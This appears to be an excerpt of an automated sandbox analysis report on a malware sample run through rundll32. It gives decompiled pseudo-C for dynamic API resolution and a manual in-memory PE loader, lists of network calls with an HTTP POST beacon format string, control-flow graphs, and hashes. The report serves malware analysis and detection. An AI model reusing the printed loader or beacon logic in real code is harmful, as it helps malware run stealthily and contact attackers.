				void* _t32;
				void* _t40;

				_v8 = LoadLibraryA("msvcrt.dll");
				_v12 = LoadLibraryA("kernel32.dll");
				 *0x3373010 = GetProcAddress(_v8, "realloc");
				 *0x3373020 = GetProcAddress(_v8, "exit");
				 *0x3373024 = GetProcAddress(_v8, "strncmp");
				 *0x3373008 = GetProcAddress(_v8, "free");
				 *0x337300c = GetProcAddress(_v8, "malloc");
				 *0x3373014 = GetProcAddress(_v12, "CreateDirectoryA");
				 *0x3373018 = GetProcAddress(_v12, "CreateProcessA");
				 *0x337301c = GetProcAddress(_v12, "DeleteFileA");
				 *0x3373028 = GetProcAddress(_v8, "memset");
				 *0x3373030 = GetProcAddress(_v8, "memcpy");
				 *0x337302c = GetProcAddress(_v8, "strstr"); // executed
				E03371040(); // executed
				_t32 = E033710B0(_t40); // executed
				return _t32;
			}







    0x033711b1
    0x033711bf
    0x033711d1
    0x033711e5
    0x033711f9
    0x0337120d
    0x03371221
    0x03371235
    0x03371249
    0x0337125d
    0x03371271
    0x03371285
    0x03371299
    0x0337129e
    0x033712a3
    0x033712ab

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 033711AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 033711B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 033711CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 033711DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 033711F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 03371207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 0337121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 0337122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 03371243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 03371257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 0337126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 0337127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 03371293
      • Part of subcall function 03371040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,033712A3), ref: 0337108A
      • Part of subcall function 033710B0: Sleep.KERNEL32(00003A98), ref: 03371166
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: 0e111d47c250533cd9a00f8a2c0f40adc0529c3c7b409797da5ac8e23b704580
    • Instruction ID: e3919abfa4fcfed70c10c8bb4caaa5d584c5df67eb9503ebb2bc25ce96a6f94e
    • Opcode Fuzzy Hash: 0e111d47c250533cd9a00f8a2c0f40adc0529c3c7b409797da5ac8e23b704580
    • Instruction Fuzzy Hash: 0C21BAB9940304EFC730EFA0D9C996E7B79F748711F200D59EA92D6209D67C9900EBB1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1B50, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 5 11a1b50-11a1b77 call 11a1270 8 11a1b79-11a1b7b 5->8 9 11a1b80-11a1b91 5->9 10 11a1f6a-11a1f6d 8->10 11 11a1b93-11a1ba0 SetLastError 9->11 12 11a1ba5-11a1bc0 call 11a1270 9->12 11->10 15 11a1bc9-11a1bde 12->15 16 11a1bc2-11a1bc4 12->16 17 11a1bf2-11a1bff 15->17 18 11a1be0-11a1bed SetLastError 15->18 16->10 19 11a1c13-11a1c1c 17->19 20 11a1c01-11a1c0e SetLastError 17->20 18->10 21 11a1c1e-11a1c2b SetLastError 19->21 22 11a1c30-11a1c51 19->22 20->10 21->10 23 11a1c65-11a1c6f 22->23 24 11a1c71-11a1c78 23->24 25 11a1ca7-11a1ce2 GetNativeSystemInfo 23->25 26 11a1c7a-11a1c86 24->26 27 11a1c88-11a1c94 24->27 28 11a1cf6-11a1d15 VirtualAlloc 25->28 29 11a1ce4-11a1cf1 SetLastError 25->29 30 11a1c97-11a1c9d 26->30 27->30 31 11a1d42-11a1d5a GetProcessHeap HeapAlloc 28->31 32 11a1d17-11a1d31 VirtualAlloc 28->32 29->10 33 11a1c9f-11a1ca2 30->33 34 11a1ca5 30->34 36 11a1d7c-11a1d92 31->36 37 11a1d5c-11a1d77 VirtualFree SetLastError 31->37 32->31 35 11a1d33-11a1d3d SetLastError 32->35 33->34 34->23 35->10 39 11a1d9d 36->39 40 11a1d94-11a1d9b 36->40 37->10 41 11a1da4-11a1def call 11a1270 39->41 40->41 44 11a1dfb-11a1e60 VirtualAlloc call 11a10d0 call 11a12a0 41->44 45 11a1df1 41->45 53 11a1e6c-11a1e7d 44->53 54 11a1e62 44->54 46 11a1f5c-11a1f68 call 11a2120 45->46 46->10 55 11a1e7f-11a1e95 call 11a17b0 53->55 56 11a1e97-11a1e9a 53->56 54->46 57 11a1ea1-11a1eaf call 11a18c0 55->57 56->57 62 11a1ebb-11a1ec9 call 11a15b0 57->62 63 11a1eb1 57->63 66 11a1ecb 62->66 67 11a1ed5-11a1ee3 call 11a1730 62->67 63->46 66->46 70 11a1ee9-11a1ef2 67->70 71 11a1ee5 67->71 72 11a1f4d-11a1f50 70->72 73 11a1ef4-11a1efb 70->73 71->46 74 11a1f57-11a1f5a 72->74 75 11a1f3a-11a1f48 73->75 76 11a1efd-11a1f13 call 3371010 73->76 74->10 74->46 77 11a1f4b 75->77 78 11a1f16-11a1f1d 76->78 77->74 79 11a1f2e-11a1f38 78->79 80 11a1f1f-11a1f2a SetLastError 78->80 79->77 80->46
    C-Code - Quality: 90%
    			E011A1B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v100;
				char _v104;
				void* _t184;
				void* _t195;
				void* _t202;
				void* _t205;
				void* _t206;
				void* _t223;
				intOrPtr _t320;

				_v20 = __ecx;
				_v8 = 0;
				_v40 = 0;
				if(E011A1270(_v20, _a8, 0x40) != 0) {
					_v28 = _a4;
					if(( *_v28 & 0x0000ffff) == 0x5a4d) {
						if(E011A1270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) {
							_v12 = _a4 + _v28[0x1e];
							if( *_v12 == 0x4550) {
								_t19 = _v12 + 4; // 0x3
								if(( *_t19 & 0x0000ffff) == 0x14c) {
									_t21 = _v12 + 0x38; // 0x0
									if(( *_t21 & 0x00000001) == 0) {
										_t23 = _v12 + 0x14; // 0x0
										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x11a4018
										_v24 = _v12 + _t26;
										_t29 = _v12 + 0x38; // 0x0
										_v60 =  *_t29;
										_v32 = 0;
										while(1) {
											_t37 = _v12 + 6; // 0x40000
											if(_v32 >= ( *_t37 & 0x0000ffff)) {
												break;
											}
											if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10));
											} else {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60;
											}
											if(_v36 > _v40) {
												_v40 = _v36;
											}
											_v32 = _v32 + 1;
											_v24 = _v24 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v104); // executed
										_t56 = _v12 + 0x50; // 0x70207369
										_t59 = _v100 - 1; // 0x70207368
										_v44 =  *_t56 + _t59 &  !(_v100 - 1);
										_t65 = _v100 - 1; // -1
										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) {
											_t70 = _v12 + 0x34; // 0x0
											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed
											_v16 = _t184;
											if(_v16 != 0) {
												L26:
												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v8 != 0) {
													 *((intOrPtr*)(_v8 + 4)) = _v16;
													_t83 = _v12 + 0x16; // 0x400000
													if(( *_t83 & 0x2000) == 0) {
														_v48 = 0;
													} else {
														_v48 = 1;
													}
													 *(_v8 + 0x14) = _v48;
													 *((intOrPtr*)(_v8 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v8 + 0x20)) = _a16;
													 *((intOrPtr*)(_v8 + 0x24)) = _a20;
													 *((intOrPtr*)(_v8 + 0x28)) = _a24;
													 *((intOrPtr*)(_v8 + 0x30)) = _v100;
													_t105 = _v12 + 0x54; // 0x72676f72
													if(E011A1270(_v20, _a8,  *_t105) != 0) {
														_t109 = _v12 + 0x54; // 0x72676f72
														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed
														_v52 = _t195;
														_t113 = _v12 + 0x54; // 0x72676f72
														E011A10D0(_v52, _v28,  *_t113);
														 *_v8 = _v52 + _v28[0x1e];
														 *((intOrPtr*)( *_v8 + 0x34)) = _v16;
														_t202 = E011A12A0(_v20, _a4, _a8, _v12, _v8); // executed
														if(_t202 != 0) {
															_t131 = _v12 + 0x34; // 0x0
															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131;
															_v56 = _t320;
															if(_t320 == 0) {
																 *((intOrPtr*)(_v8 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v8 + 0x18)) = E011A17B0(_v20, _v8, _v56);
															}
															_t205 = E011A18C0(_v20, _v8); // executed
															if(_t205 != 0) {
																_t206 = E011A15B0(_v20, _v8); // executed
																if(_t206 != 0) {
																	if(E011A1730(_v20, _v8) != 0) {
																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) {
																			 *(_v8 + 0x2c) = 0;
																			L52:
																			return _v8;
																		}
																		if( *(_v8 + 0x14) == 0) {
																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																			L50:
																			goto L52;
																		}
																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																		_v68 = _v64(_v16, 1, 0);
																		if(_v68 != 0) {
																			 *((intOrPtr*)(_v8 + 0x10)) = 1;
																			goto L50;
																		}
																		SetLastError(0x45a);
																		goto L53;
																	}
																	goto L53;
																}
																goto L53;
															}
															goto L53;
														}
														goto L53;
													} else {
														L53:
														E011A2120(_v20, _v8);
														return 0;
													}
												}
												VirtualFree(_v16, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed
											_v16 = _t223;
											if(_v16 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}




























    0x011a1b56
    0x011a1b59
    0x011a1b60
    0x011a1b77
    0x011a1b83
    0x011a1b91
    0x011a1bc0
    0x011a1bd2
    0x011a1bde
    0x011a1bf5
    0x011a1bff
    0x011a1c16
    0x011a1c1c
    0x011a1c33
    0x011a1c3a
    0x011a1c3e
    0x011a1c44
    0x011a1c47
    0x011a1c4a
    0x011a1c65
    0x011a1c68
    0x011a1c6f
    0x00000000
    0x00000000
    0x011a1c78
    0x011a1c94
    0x011a1c7a
    0x011a1c83
    0x011a1c83
    0x011a1c9d
    0x011a1ca2
    0x011a1ca2
    0x011a1c59
    0x011a1c62
    0x011a1c62
    0x011a1cab
    0x011a1cb4
    0x011a1cba
    0x011a1cc8
    0x011a1cd1
    0x011a1ce2
    0x011a1d04
    0x011a1d08
    0x011a1d0e
    0x011a1d15
    0x011a1d42
    0x011a1d53
    0x011a1d5a
    0x011a1d82
    0x011a1d88
    0x011a1d92
    0x011a1d9d
    0x011a1d94
    0x011a1d94
    0x011a1d94
    0x011a1daa
    0x011a1db3
    0x011a1dbc
    0x011a1dc5
    0x011a1dce
    0x011a1dd7
    0x011a1ddd
    0x011a1def
    0x011a1e05
    0x011a1e0d
    0x011a1e13
    0x011a1e19
    0x011a1e25
    0x011a1e39
    0x011a1e43
    0x011a1e59
    0x011a1e60
    0x011a1e77
    0x011a1e77
    0x011a1e7a
    0x011a1e7d
    0x011a1e9a
    0x011a1e7f
    0x011a1e92
    0x011a1e92
    0x011a1ea8
    0x011a1eaf
    0x011a1ec2
    0x011a1ec9
    0x011a1ee3
    0x011a1ef2
    0x011a1f50
    0x011a1f57
    0x00000000
    0x011a1f57
    0x011a1efb
    0x011a1f48
    0x011a1f4b
    0x00000000
    0x011a1f4b
    0x011a1f08
    0x011a1f16
    0x011a1f1d
    0x011a1f31
    0x00000000
    0x011a1f31
    0x011a1f24
    0x00000000
    0x011a1f24
    0x00000000
    0x011a1ee5
    0x00000000
    0x011a1ecb
    0x00000000
    0x011a1eb1
    0x00000000
    0x011a1df1
    0x011a1f5c
    0x011a1f63
    0x00000000
    0x011a1f68
    0x011a1def
    0x011a1d67
    0x011a1d6f
    0x00000000
    0x011a1d75
    0x011a1d24
    0x011a1d2a
    0x011a1d31
    0x00000000
    0x00000000
    0x011a1d35
    0x00000000
    0x011a1d3b
    0x011a1ce9
    0x00000000
    0x011a1cef
    0x011a1c23
    0x00000000
    0x011a1c29
    0x011a1c06
    0x00000000
    0x011a1c0c
    0x011a1be5
    0x00000000
    0x011a1beb
    0x00000000
    0x011a1bc2
    0x011a1b98
    0x00000000
    0x011a1b9e
    0x00000000

    APIs
      • Part of subcall function 011A1270: SetLastError.KERNEL32(0000000D,?,?,011A1B75,011A1025,00000040), ref: 011A1281
    • SetLastError.KERNEL32(000000C1,011A1025,00000040), ref: 011A1B98
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 1bff18bff92a32b05257ddc985b4c519ffcd6ff8b40bd9c2e6864145ef2ac28d
    • Instruction ID: 4b984727ffa06504312da888600dd5eb66a8d8684427021cff1a70818caea5fa
    • Opcode Fuzzy Hash: 1bff18bff92a32b05257ddc985b4c519ffcd6ff8b40bd9c2e6864145ef2ac28d
    • Instruction Fuzzy Hash: 51E11B78A00209EFDB08CFA8C994AAEBFB5FF48314F508559E515AB385D730AE85CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03371640, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 212networkCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • wsprintfA.USER32 ref: 0337173A
    • WSAStartup.WS2_32(00000102,?), ref: 0337174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 03371766
    • gethostbyname.WS2_32(?), ref: 03371779
    • htons.WS2_32(?), ref: 0337178D
    • connect.WS2_32(?,?,00000010), ref: 033717D2
    • send.WS2_32(?,?,?,00000000), ref: 03371854
    • recv.WS2_32(?,?,00000BB8,00000000), ref: 033718C1
    Strings
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 0337172E
    • ping, xrefs: 03371657
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: f76a058968d8d38a02bc32f2d14cf796cc3f330a83ae2739c5db36d1bd87403b
    • Instruction ID: cf39feb90186deb5218ecd6237716500d401723789a04bdd5b465108476d364e
    • Opcode Fuzzy Hash: f76a058968d8d38a02bc32f2d14cf796cc3f330a83ae2739c5db36d1bd87403b
    • Instruction Fuzzy Hash: 22B10375D042A89FDB20DF64DD84AD9B7B9AF48300F0085C9E58DE7285D7B46AC4CF61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011921A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 201 11921a0-11921d1 202 11921dd-1192201 IsBadHugeReadPtr 201->202 203 11921d3-11921d8 201->203 206 11923c0 202->206 207 1192207-119220e 202->207 204 11923c3-11923c6 203->204 206->204 207->206 208 1192214-1192237 207->208 210 1192239-1192248 SetLastError 208->210 211 119224d-1192262 call 1191a20 208->211 210->206 213 1192267-1192271 211->213 214 119229d-11922cd 213->214 215 1192273-1192298 SetLastError 213->215 216 11922e8-11922fd 214->216 217 11922cf-11922e6 214->217 215->206 219 1192300 216->219 217->219 220 1192314-119231a 219->220 221 119231c-1192327 220->221 222 1192395-1192399 220->222 223 1192329-1192350 221->223 224 1192352-119237d 221->224 225 11923bb 222->225 226 119239b-11923b9 SetLastError 222->226 230 119237f-1192385 223->230 224->230 225->206 226->206 231 1192390 230->231 232 1192387-119238e 230->232 231->220 232->222
    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011921F9
    • SetLastError.KERNEL32(0000007E), ref: 0119223B
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 88b5f71b9a24685b02a179a60394f8ab8ed429b5ee289f9b35cd5072d0e2bcd2
    • Instruction ID: fd8a2a22c17c528bb377cb98325e131eaaff1fc85092d16464f8e0c1ffe14295
    • Opcode Fuzzy Hash: 88b5f71b9a24685b02a179a60394f8ab8ed429b5ee289f9b35cd5072d0e2bcd2
    • Instruction Fuzzy Hash: 2181AB74A04209EFDB08DF98C894AADBBB1FF48314F148158E919AB355D734EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A18C0, Relevance: 5.2, APIs: 4, Instructions: 183COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 234 11a18c0-11a18f4 235 11a1900-11a1924 IsBadReadPtr 234->235 236 11a18f6-11a18fb 234->236 239 11a192a-11a1931 235->239 240 11a1ae3 235->240 237 11a1ae6-11a1ae9 236->237 239->240 241 11a1937-11a195a call 11a1af0 239->241 240->237 243 11a195c-11a196b SetLastError 241->243 244 11a1970-11a1985 call 11a1170 241->244 243->240 246 11a198a-11a1994 244->246 247 11a19c0-11a19f0 246->247 248 11a1996-11a19bb SetLastError 246->248 249 11a1a0b-11a1a20 247->249 250 11a19f2-11a1a09 247->250 248->240 252 11a1a23 249->252 250->252 253 11a1a37-11a1a3d 252->253 254 11a1ab8-11a1abc 253->254 255 11a1a3f-11a1a4a 253->255 256 11a1ade 254->256 257 11a1abe-11a1adc SetLastError 254->257 258 11a1a4c-11a1a73 255->258 259 11a1a75-11a1aa0 255->259 256->240 257->240 263 11a1aa2-11a1aa8 258->263 259->263 264 11a1aaa-11a1ab1 263->264 265 11a1ab3 263->265 264->254 265->253
    C-Code - Quality: 37%
    			E011A18C0(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				signed int* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t117;
				intOrPtr _t135;
				intOrPtr _t140;
				void* _t206;
				void* _t207;

				_v44 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v16 =  *_t3;
				_v28 = 1;
				_v32 =  *_a4 + 0xbadc25;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v16 +  *_v32;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t21 = _a4 + 0x28; // 0x0
						_t26 = _a4 + 0x1c; // 0x0, executed
						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed
						_t207 = _t206 + 8;
						_v24 = _t114;
						if(_v24 != 0) {
							_t31 = _a4 + 0xc; // 0xffff
							_t35 = _a4 + 8; // 0x4
							_t117 = E011A1170( *_t35, 4 +  *_t31 * 4); // executed
							_t206 = _t207 + 8;
							_v36 = _t117;
							if(_v36 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v36;
								_t48 = _a4 + 0xc; // 0xffff
								_t50 = _a4 + 8; // 0x4
								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
								_t55 = _a4 + 0xc; // 0xffff
								 *(_a4 + 0xc) =  *_t55 + 1;
								if( *_v8 == 0) {
									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v12 = _v16 +  *_v8;
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v12 != 0) {
									if(( *_v12 & 0x80000000) == 0) {
										_v40 = _v16 +  *_v12;
										_t91 = _a4 + 0x28; // 0x0
										_t95 = _a4 + 0x20; // 0x0
										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91);
										_t206 = _t206 + 0xc;
										 *_v20 = _t135;
									} else {
										_t81 = _a4 + 0x28; // 0x0
										_t85 = _a4 + 0x20; // 0x0
										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81);
										_t206 = _t206 + 0xc;
										 *_v20 = _t140;
									}
									if( *_v20 != 0) {
										_v12 =  &(_v12[1]);
										_v20 = _v20 + 4;
										continue;
									} else {
										_v28 = 0;
										break;
									}
								}
								if(_v28 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								_t101 = _a4 + 0x28; // 0x0
								_t104 = _a4 + 0x24; // 0x0
								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
								SetLastError(0x7f);
								break;
							}
							_t39 = _a4 + 0x28; // 0x0
							_t42 = _a4 + 0x24; // 0x0
							 *((intOrPtr*)( *_t42))(_v24,  *_t39);
							SetLastError(0xe);
							_v28 = 0;
							break;
						}
						SetLastError(0x7e);
						_v28 = 0;
						break;
					}
					return _v28;
				}
				return 1;
			}



















    0x011a18c6
    0x011a18cc
    0x011a18cf
    0x011a18d2
    0x011a18ea
    0x011a18f4
    0x011a1908
    0x011a1916
    0x011a193a
    0x011a194b
    0x011a194e
    0x011a1950
    0x011a1953
    0x011a195a
    0x011a1973
    0x011a1981
    0x011a1985
    0x011a198a
    0x011a198d
    0x011a1994
    0x011a19c6
    0x011a19cc
    0x011a19d2
    0x011a19d8
    0x011a19de
    0x011a19e7
    0x011a19f0
    0x011a1a14
    0x011a1a20
    0x011a19f2
    0x011a19fa
    0x011a1a06
    0x011a1a06
    0x011a1a37
    0x011a1a4a
    0x011a1a7d
    0x011a1a83
    0x011a1a95
    0x011a1a98
    0x011a1a9a
    0x011a1aa0
    0x011a1a4c
    0x011a1a4f
    0x011a1a66
    0x011a1a69
    0x011a1a6b
    0x011a1a71
    0x011a1a71
    0x011a1aa8
    0x011a1a2b
    0x011a1a34
    0x00000000
    0x011a1aaa
    0x011a1aaa
    0x00000000
    0x011a1aaa
    0x011a1aa8
    0x011a1abc
    0x011a1913
    0x00000000
    0x011a1913
    0x011a1ac1
    0x011a1acc
    0x011a1acf
    0x011a1ad6
    0x00000000
    0x011a1ad6
    0x011a1999
    0x011a19a4
    0x011a19a7
    0x011a19ae
    0x011a19b4
    0x00000000
    0x011a19b4
    0x011a195e
    0x011a1964
    0x00000000
    0x011a1964
    0x00000000
    0x011a1ae3
    0x00000000

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011A191C
    • SetLastError.KERNEL32(0000007E), ref: 011A195E
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 22ece9b88b11801215e915752318c59c68cab7abb1a1ce6d964d708a7e870799
    • Instruction ID: 22e66af2499eb9b7077e0e7f7f2e07ec618a590cb300a012b4d7666dfaa55108
    • Opcode Fuzzy Hash: 22ece9b88b11801215e915752318c59c68cab7abb1a1ce6d964d708a7e870799
    • Instruction Fuzzy Hash: D281B878A00209EFDB08CF88C590BAEBBB1FF48314F548158E959AB355D774EA81CF95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0115002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 268 115002d-115009e call 1150456 * 6 281 11500a7-11500b0 268->281 282 11500a0-11500a2 268->282 281->282 284 11500b2-11500b6 281->284 283 115044e-1150455 282->283 284->282 285 11500b8-11500c2 284->285 286 11500e4-1150105 GetNativeSystemInfo 285->286 287 11500c4-11500c7 285->287 286->282 288 1150107-115012d VirtualAlloc 286->288 289 11500c9-11500cf 287->289 290 1150162-115016c 288->290 291 115012f-1150133 288->291 292 11500d6 289->292 293 11500d1-11500d4 289->293 296 11501a4-11501b5 290->296 297 115016e-1150173 290->297 295 1150135-1150138 291->295 294 11500d9-11500e2 292->294 293->294 294->286 294->289 300 1150153-1150155 295->300 301 115013a-1150142 295->301 298 1150234-1150240 296->298 299 11501b7-11501d1 296->299 302 1150177-115018a 297->302 305 1150246-115025d 298->305 306 11502f0-11502fa 298->306 321 11501d3 299->321 322 1150222-115022e 299->322 308 1150157-115015c 300->308 301->300 307 1150144-1150147 301->307 303 115018c-1150193 302->303 304 1150199-115019e 302->304 303->303 309 1150195 303->309 304->302 312 11501a0 304->312 305->306 313 1150263-1150273 305->313 310 1150300-1150307 306->310 311 11503b2-11503c7 call 1192690 306->311 315 115014e-1150151 307->315 316 1150149-115014c 307->316 308->295 317 115015e 308->317 309->304 318 1150309-1150312 310->318 343 11503c9-11503ce 311->343 312->296 319 11502d5-11502e6 313->319 320 1150275-1150279 313->320 315->308 316->300 316->315 317->290 325 11503a7-11503ac 318->325 326 1150318-1150333 318->326 319->313 323 11502ec 319->323 327 115027a-1150289 320->327 328 11501d7-11501db 321->328 322->299 324 1150230 322->324 323->306 324->298 325->311 325->318 330 1150335-1150337 326->330 331 115034d-115034f 326->331 332 1150291-115029a 327->332 333 115028b-115028f 327->333 334 11501dd 328->334 335 11501fb-1150204 328->335 336 1150340-1150343 330->336 337 1150339-115033e 330->337 340 1150351-1150353 331->340 341 1150368-115036a 331->341 339 11502c3-11502c7 332->339 333->332 338 115029c-11502a1 333->338 334->335 342 11501df-11501f9 334->342 351 1150207-115021c 335->351 346 1150345-115034b 336->346 337->346 347 11502b4-11502b7 338->347 348 11502a3-11502b2 338->348 339->327 354 11502c9-11502d1 339->354 349 1150355-1150357 340->349 350 1150359-115035b 340->350 344 1150371-1150376 341->344 345 115036c 341->345 342->351 352 11503d0-11503d4 343->352 353 115044c 343->353 356 1150379-1150380 344->356 355 115036e-115036f 345->355 346->356 347->339 357 11502b9-11502bf 347->357 348->339 349->355 350->341 358 115035d-115035f 350->358 351->328 360 115021e 351->360 352->353 359 11503d6-11503e0 352->359 353->283 354->319 355->356 361 1150382 356->361 362 1150388-115039d VirtualProtect 356->362 357->339 358->356 363 1150361-1150366 358->363 359->353 364 11503e2-11503e6 359->364 360->322 361->362 362->282 366 11503a3 362->366 363->356 364->353 365 11503e8-11503f9 364->365 365->353 367 11503fb-1150400 365->367 366->325 368 1150402-115040f 367->368 368->368 369 1150411-1150415 368->369 370 1150417-1150429 369->370 371 115042d-1150433 369->371 370->367 372 115042b 370->372 371->353 373 1150435-115044b 371->373 372->353 373->353
    APIs
    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01150005), ref: 011500E9
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01150005), ref: 01150111
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
